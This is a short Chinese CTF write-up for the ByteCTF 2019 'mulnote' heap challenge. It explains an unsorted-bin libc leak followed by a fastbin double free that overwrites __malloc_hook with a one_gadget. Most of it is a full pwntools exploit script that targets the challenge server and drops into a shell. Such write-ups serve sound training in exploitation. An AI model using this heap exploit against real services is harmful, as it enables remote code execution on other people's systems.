BYTECTF2019-mulnote

算是第一次在比赛时间里解出堆题?2333菜鸡只能做签到题了

感觉主要难点就是控制流平坦化吧,但是note的写法比较固定了,稍微猜一猜就猜出了程序的逻辑。

unsorted bin leak出libc地址,然后double free拿malloc_hook,经常看见这样的题目。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#coding=UTF-8
from pwn import *
from LibcSearcher import *
onegadget=[0x45216,0x4526a,0xf02a4,0xf1147]
def Create(size,content):
sh.recvuntil(">")
sh.sendline("C")
sh.recvuntil("size>")
sh.sendline(str(int(size)))
sh.recvuntil("note>")
sh.send(content)
def Edit(index,content):
sh.recvuntil(">")
sh.sendline("E")
sh.recvuntil("index>")
sh.sendline(index)
sh.recvuntil("note>")
sh.send(content)
def Remove(index):
sh.recvuntil(">")
sh.sendline("R")
sh.recvuntil("index>")
sh.sendline(index)
def Show():
sh.recvuntil(">")
sh.sendline("S")
def XB(index,size):
sh.recvuntil(">")
sh.send("XxXxBbBb")
sh.recvuntil("index")
sh.sendline(index)
sh.recvuntil("new size>size>")
sh.sendline(str(int(size)))

#sh=process("./mulnote")
sh=remote("112.126.101.96",9999)
Create(0x80,"1")
Create(16,'2')
Remove("0")
Show()
sh.recvuntil("note[0]:\n")
leak=u64(sh.recv(6)+'\x00\x00')
malloc_hook=leak-88-0x10
libcbase=leak-88-0x3C4B20
log.success("malloc_hook: "+hex(leak-88-0x10))
Create(0x60,'\x11')
Create(0x60,'\x22')
Remove("2")
Remove("3")
Remove("2")
Create(0x60,p64(malloc_hook-0x23))
Create(0x60,p64(malloc_hook-0x23))
Create(0x60,p64(malloc_hook-0x23))
Create(0x60,'\x00'*19+p64(libcbase+onegadget[1]))
sh.recvuntil(">")
sh.sendline("C")
sh.recvuntil("size>")
sh.interactive()
文章目录
|